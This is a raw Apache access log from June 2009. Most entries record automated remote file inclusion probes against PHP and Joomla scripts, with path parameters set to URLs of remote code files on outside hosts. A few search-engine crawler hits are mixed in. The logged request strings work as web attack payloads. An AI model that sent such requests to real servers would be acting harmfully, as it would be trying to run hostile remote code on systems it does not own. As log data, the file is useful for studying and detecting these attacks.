110.45.145.50 - - [04/Jun/2009:10:09:38 -0500] "GET /logs/access_log.1233705600///include/footer.php?_path[counter]=http://mmobugs.net/img/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
110.45.145.50 - - [04/Jun/2009:10:09:38 -0500] "GET /logs/access_log.1235952000///include/footer.php?_path[counter]=http://mmobugs.net/img/fx29id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
220.181.7.97 - - [04/Jun/2009:10:11:11 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.19.72.18 - - [04/Jun/2009:10:12:12 -0500] "GET /logs/bbs/include/footer.php?_path[counter]=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 310 "-""libwww-perl/5.805"
67.19.72.18 - - [04/Jun/2009:10:12:12 -0500] "GET /bbs/include/footer.php?_path[counter]=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 305 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:15:14 -0500] "GET /logs/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:15:14 -0500] "GET /footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:15:14 -0500] "GET /logs/access_log.1233705600/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:15:15 -0500] "GET /logs/access_log.1235952000/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:15:15 -0500] "GET /logs/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:15:15 -0500] "GET /logs/access_log.1233705600/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:15:15 -0500] "GET /footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:15:15 -0500] "GET /logs/access_log.1235952000/footer.php?_path[counter]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
65.55.106.191 - - [04/Jun/2009:10:15:57 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.232.54.48 - - [04/Jun/2009:10:16:34 -0500] "GET /?DOCUMENT_ROOT=http://primkray.ru/clx/copyright? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:10:16:34 -0500] "GET /logs/access_log.1233619200/?DOCUMENT_ROOT=http://primkray.ru/clx/copyright? HTTP/1.1" 404 310 "-""Mozilla/5.0"
65.55.106.191 - - [04/Jun/2009:10:17:06 -0500] "GET /logs/access_log.1120780800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.106.169 - - [04/Jun/2009:10:17:36 -0500] "GET /logs/access_log.1234915200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.162.28 - - [04/Jun/2009:10:18:46 -0500] "GET /logs//agenda2.php3?rootagenda=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 301 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:10:18:46 -0500] "GET /logs/access_log.1235606400//agenda2.php3?rootagenda=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:10:18:46 -0500] "GET //agenda2.php3?rootagenda=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 296 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
199.120.90.222 - - [04/Jun/2009:10:18:51 -0500] "GET /home.php?index=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:10:18:51 -0500] "GET /logs/access_log.1238025600/home.php?index=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:10:18:52 -0500] "GET /logs/access_log.1239667200/home.php?index=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:10:18:54 -0500] "GET /logs/home.php?index=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:19:49 -0500] "GET /logs/access_log.1238889600//agenda2.php3?rootagenda=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 323 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
65.23.158.226 - - [04/Jun/2009:10:20:18 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:20:18 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:20:18 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:20:27 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:20:27 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:20:27 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:20:53 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:10:20:54 -0500] "GET /logs/home.php?index=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 296 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:10:20:54 -0500] "GET /logs/access_log.1238025600/home.php?index=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:10:20:54 -0500] "GET /home.php?index=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 291 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:21:08 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.208.132 - - [04/Jun/2009:10:21:19 -0500] "GET /logs/access_log.1198540800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [04/Jun/2009:10:21:21 -0500] "GET /logs/access_log.1199750400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
81.196.124.252 - - [04/Jun/2009:10:21:52 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:10:21:52 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:10:21:52 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:10:22:30 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:10:22:30 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:10:22:30 -0500] "GET /logs/access_log.1241222400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.106.67.146 - - [04/Jun/2009:10:22:41 -0500] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 3245 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
87.106.67.146 - - [04/Jun/2009:10:22:43 -0500] "GET /logs//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.litana.ru/48e58559133e5ed1d37ebb57b6dd9b21/test.txt?? HTTP/1.1" 200 191989 "-""Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
218.150.79.146 - - [04/Jun/2009:10:23:07 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 342 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:10:23:07 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 347 "-""Mozilla/5.0"
81.196.124.252 - - [04/Jun/2009:10:23:07 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:10:23:07 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:10:23:18 -0500] "GET /logs/access_log.1239408000//include/mail.inc.php?skin_board_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 331 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:10:23:20 -0500] "GET //include/mail.inc.php?skin_board_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 304 "-""Mozilla/5.0"
201.232.54.48 - - [04/Jun/2009:10:23:23 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://primkray.ru/clx/copyright? HTTP/1.1" 404 309 "-""Mozilla/5.0"
121.130.29.11 - - [04/Jun/2009:10:23:25 -0500] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.130.29.11 - - [04/Jun/2009:10:23:25 -0500] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.130.29.11 - - [04/Jun/2009:10:23:25 -0500] "GET /logs/access_log.1240358400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:23:25 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:23:25 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:23:25 -0500] "GET //guestbook1//admin.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
122.200.150.250 - - [04/Jun/2009:10:23:32 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
121.130.29.11 - - [04/Jun/2009:10:23:40 -0500] "GET /logs/access_log.1242000000//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:10:23:47 -0500] "GET //include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:10:23:47 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:10:23:47 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
211.239.150.144 - - [04/Jun/2009:10:24:03 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.239.150.144 - - [04/Jun/2009:10:24:03 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.239.150.144 - - [04/Jun/2009:10:24:03 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:10:24:04 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.wolom.net/WebCalendar//ws/CVS/id1.txt?? HTTP/1.1" 404 360 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:10:24:04 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.wolom.net/WebCalendar//ws/CVS/id1.txt?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:10:24:04 -0500] "GET /logs/access_log.1239753600//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.wolom.net/WebCalendar//ws/CVS/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:10:24:10 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:24:11 -0500] "GET /logs/access_log.1239753600//guestbook1//admin.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
211.239.150.144 - - [04/Jun/2009:10:24:12 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.239.150.144 - - [04/Jun/2009:10:24:12 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.239.150.144 - - [04/Jun/2009:10:24:12 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:10:24:20 -0500] "GET /logs/access_log.1241222400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:10:24:20 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:10:24:20 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
222.239.76.25 - - [04/Jun/2009:10:24:21 -0500] "GET /logs/access_log.1236643200//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.wolom.net/WebCalendar//ws/CVS/id1.txt?? HTTP/1.1" 404 382 "-""Mozilla/5.0"
211.239.150.144 - - [04/Jun/2009:10:24:31 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.239.150.144 - - [04/Jun/2009:10:24:38 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:10:25:05 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:10:25:05 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:10:25:05 -0500] "GET //include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:10:25:10 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:10:25:10 -0500] "GET //include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
61.250.85.200 - - [04/Jun/2009:10:25:10 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:10:25:54 -0500] "GET //guestbook1//admin.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:10:25:54 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:10:25:54 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
86.122.170.50 - - [04/Jun/2009:10:26:02 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
86.122.170.50 - - [04/Jun/2009:10:26:02 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 351 "-""Mozilla/5.0"
86.122.170.50 - - [04/Jun/2009:10:26:02 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:10:26:32 -0500] "GET /logs/access_log.1239753600//guestbook1//admin.php?include_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
86.122.170.50 - - [04/Jun/2009:10:26:37 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://buminch.org/bbs/fx29id1.txt??? HTTP/1.1" 404 373 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:10:27:27 -0500] "GET /logs/access_log.1241222400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:10:27:27 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:10:27:27 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
60.251.217.4 - - [04/Jun/2009:10:28:50 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.proektov.ru/id.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:10:29:43 -0500] "GET /logs/access_log.1241222400//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:10:29:43 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
87.106.135.14 - - [04/Jun/2009:10:29:43 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:10:30:19 -0500] "GET /config.php?path_to_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:10:30:19 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:10:30:19 -0500] "GET /logs/config.php?path_to_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:10:30:39 -0500] "GET /config.php?path_to_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:10:30:39 -0500] "GET /logs/config.php?path_to_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
62.140.23.192 - - [04/Jun/2009:10:30:39 -0500] "GET /logs/access_log.1238889600/config.php?path_to_root=http://125.163.251.219/har/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:31:45 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:31:45 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:31:49 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
212.203.95.235 - - [04/Jun/2009:10:31:54 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
216.15.161.2 - - [04/Jun/2009:10:31:54 -0500] "GET //arcade.php?phpbb_root_path=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.15.161.2 - - [04/Jun/2009:10:31:54 -0500] "GET /logs/access_log.1240617600//arcade.php?phpbb_root_path=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.15.161.2 - - [04/Jun/2009:10:31:54 -0500] "GET /logs//arcade.php?phpbb_root_path=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
216.15.161.2 - - [04/Jun/2009:10:31:54 -0500] "GET //arcade.php?phpbb_root_path=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
216.15.161.2 - - [04/Jun/2009:10:31:54 -0500] "GET /logs/access_log.1240617600//arcade.php?phpbb_root_path=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.15.161.2 - - [04/Jun/2009:10:31:54 -0500] "GET /logs//arcade.php?phpbb_root_path=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
212.203.95.235 - - [04/Jun/2009:10:31:57 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
195.34.78.110 - - [04/Jun/2009:10:31:59 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:31:59 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:31:59 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:32:50 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:32:58 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
116.254.252.16 - - [04/Jun/2009:10:33:07 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
116.254.252.16 - - [04/Jun/2009:10:33:07 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
116.254.252.16 - - [04/Jun/2009:10:33:07 -0500] "GET /logs/access_log.1240790400//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
